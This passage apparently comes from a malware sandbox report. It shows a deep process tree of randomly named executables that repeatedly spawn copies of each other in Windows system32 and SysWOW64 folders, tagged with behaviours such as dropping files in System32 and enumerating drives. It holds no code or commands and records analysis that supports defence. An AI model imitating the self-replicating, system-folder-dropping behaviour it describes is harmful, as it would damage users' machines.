        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        183⤵
        
        PID:15684
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        182⤵
        
        PID:15572
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        181⤵
        
        PID:15556
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        180⤵
        
        PID:15512
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        179⤵
        
        PID:15480
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        178⤵
        
        PID:15368
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        177⤵
        
        PID:15344
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        176⤵
        
        PID:15244
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        175⤵
        
        PID:15204
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        174⤵
        
        PID:15124
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        175⤵
        
        PID:15844
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        173⤵
        
        PID:15104
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        174⤵
        
        PID:15772
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        172⤵
        
        PID:14948
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        173⤵
        
        PID:15616
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        171⤵
        
        PID:14908
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        172⤵
        
        PID:15580
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        170⤵
        
        PID:14816
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        171⤵
        
        PID:15488
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        169⤵
        
        PID:14796
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        170⤵
        
        PID:15464
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        168⤵
        
        PID:14640
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        169⤵
        
        PID:15332
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        167⤵
        
        PID:14628
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        168⤵
        
        PID:15324
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        166⤵
        
        PID:14544
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        167⤵
        
        PID:15216
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        165⤵
        
        PID:14504
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        166⤵
        
        PID:15188
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        164⤵
        
        PID:14432
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        165⤵
        
        PID:15148
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        163⤵
        
        PID:14420
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        164⤵
        
        PID:15140
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        162⤵
        
        PID:14400
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        163⤵
        
        PID:15112
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        161⤵
        
        PID:14364
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        162⤵
        
        PID:15092
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        160⤵
        
        PID:14320
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        161⤵
        
        PID:15080
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        159⤵
        
        PID:14296
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        160⤵
        
        PID:15044
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        158⤵
        
        PID:14252
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        159⤵
        
        PID:15024
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        157⤵
        Drops file in System32 directory
        
        PID:14236
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        158⤵
        
        PID:15000
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        156⤵
        
        PID:14184
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        157⤵
        
        PID:14940
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        155⤵
        Drops file in System32 directory
        
        PID:14168
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        156⤵
        
        PID:14920
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        154⤵
        
        PID:14124
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        155⤵
        
        PID:14884
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        153⤵
        Drops file in System32 directory
        
        PID:14096
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        154⤵
        
        PID:14864
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        152⤵
        
        PID:14084
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        153⤵
        
        PID:14856
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        151⤵
        
        PID:14068
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        152⤵
        
        PID:14848
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        150⤵
        
        PID:13972
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        151⤵
        
        PID:14784
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        149⤵
        
        PID:13940
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        150⤵
        
        PID:14756
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        148⤵
        
        PID:13900
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        149⤵
        
        PID:14732
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        147⤵
        
        PID:13892
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        148⤵
        
        PID:14740
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        146⤵
        Drops file in System32 directory
        
        PID:13856
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        147⤵
        
        PID:14724
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        145⤵
        
        PID:13812
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        146⤵
        
        PID:14700
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        144⤵
        
        PID:13768
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        145⤵
        
        PID:14692
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        143⤵
        
        PID:13704
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        144⤵
        
        PID:14612
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        142⤵
        
        PID:13660
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        143⤵
        
        PID:14572
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        141⤵
        
        PID:13568
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        142⤵
        
        PID:14492
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        140⤵
        
        PID:13452
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        141⤵
        
        PID:14412
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        139⤵
        
        PID:13436
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        140⤵
        
        PID:14372
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        138⤵
        
        PID:13404
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        139⤵
        
        PID:14356
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        137⤵
        
        PID:13372
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        138⤵
        
        PID:14332
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        136⤵
        
        PID:13348
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        137⤵
        
        PID:14272
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        135⤵
        
        PID:13264
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        136⤵
        
        PID:14228
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        134⤵
        
        PID:13256
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        135⤵
        
        PID:14220
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        133⤵
        
        PID:13228
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        134⤵
        
        PID:14196
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        132⤵
        
        PID:13208
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        133⤵
        
        PID:14204
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        131⤵
        
        PID:13168
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        132⤵
        
        PID:14144
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        130⤵
        
        PID:13124
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        131⤵
        
        PID:14060
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        129⤵
        
        PID:13088
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        130⤵
        
        PID:14008
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        128⤵
        
        PID:13008
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        129⤵
        
        PID:13984
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        127⤵
        
        PID:12964
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        128⤵
        
        PID:13932
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        126⤵
        
        PID:12976
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        127⤵
        
        PID:13884
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        125⤵
        
        PID:12900
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        126⤵
        
        PID:13804
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        124⤵
        Enumerates connected drives
        
        PID:12864
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        125⤵
        
        PID:13796
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        123⤵
        
        PID:12844
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        124⤵
        
        PID:13784
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        122⤵
        
        PID:12788
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        123⤵
        
        PID:13752
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        121⤵
        
        PID:12752
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        122⤵
        
        PID:13736
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        120⤵
        
        PID:12732
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        121⤵
        
        PID:13724
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        119⤵
        
        PID:12676
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        120⤵
        
        PID:13696
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        118⤵
        
        PID:12652
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        119⤵
        
        PID:13628
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        117⤵
        Drops file in System32 directory
        
        PID:12612
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        118⤵
        
        PID:13588
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        116⤵
        
        PID:12596
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        117⤵
        
        PID:13580
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        115⤵
        
        PID:12556
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        116⤵
        
        PID:13560
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        114⤵
        
        PID:12524
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        115⤵
        
        PID:13552
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        113⤵
        System Location Discovery: System Language Discovery
        
        PID:12504
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        114⤵
        
        PID:13520
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        112⤵
        
        PID:12468
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        113⤵
        
        PID:13504
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        111⤵
        
        PID:12456
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        112⤵
        
        PID:13496
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        110⤵
        
        PID:12432
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        111⤵
        
        PID:13476
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        109⤵
        
        PID:12416
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        110⤵
        
        PID:13468
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        108⤵
        
        PID:12360
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        109⤵
        
        PID:13424
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        107⤵
        
        PID:12328
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        108⤵
        
        PID:13396
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        106⤵
        
        PID:12284
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        107⤵
        
        PID:13332
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        105⤵
        
        PID:12272
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        106⤵
        
        PID:13308
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        104⤵
        
        PID:12212
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        105⤵
        
        PID:13200
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        103⤵
        
        PID:12184
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        104⤵
        
        PID:13160
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        102⤵
        
        PID:12164
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        103⤵
        
        PID:13148
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        101⤵
        
        PID:12128
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        102⤵
        
        PID:13116
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        100⤵
        
        PID:12088
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        101⤵
        
        PID:13096
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        99⤵
        
        PID:12060
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        100⤵
        
        PID:13080
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        98⤵
        
        PID:12024
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        99⤵
        
        PID:13072
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        97⤵
        
        PID:11992
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        98⤵
        
        PID:13024
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        96⤵
        
        PID:11960
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        97⤵
        
        PID:13040
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        95⤵
        
        PID:11948
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        96⤵
        
        PID:12996
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        94⤵
        
        PID:11908
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        95⤵
        
        PID:12940
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        93⤵
        
        PID:11832
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        94⤵
        
        PID:12780
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        92⤵
        
        PID:11784
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        93⤵
        
        PID:12644
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        91⤵
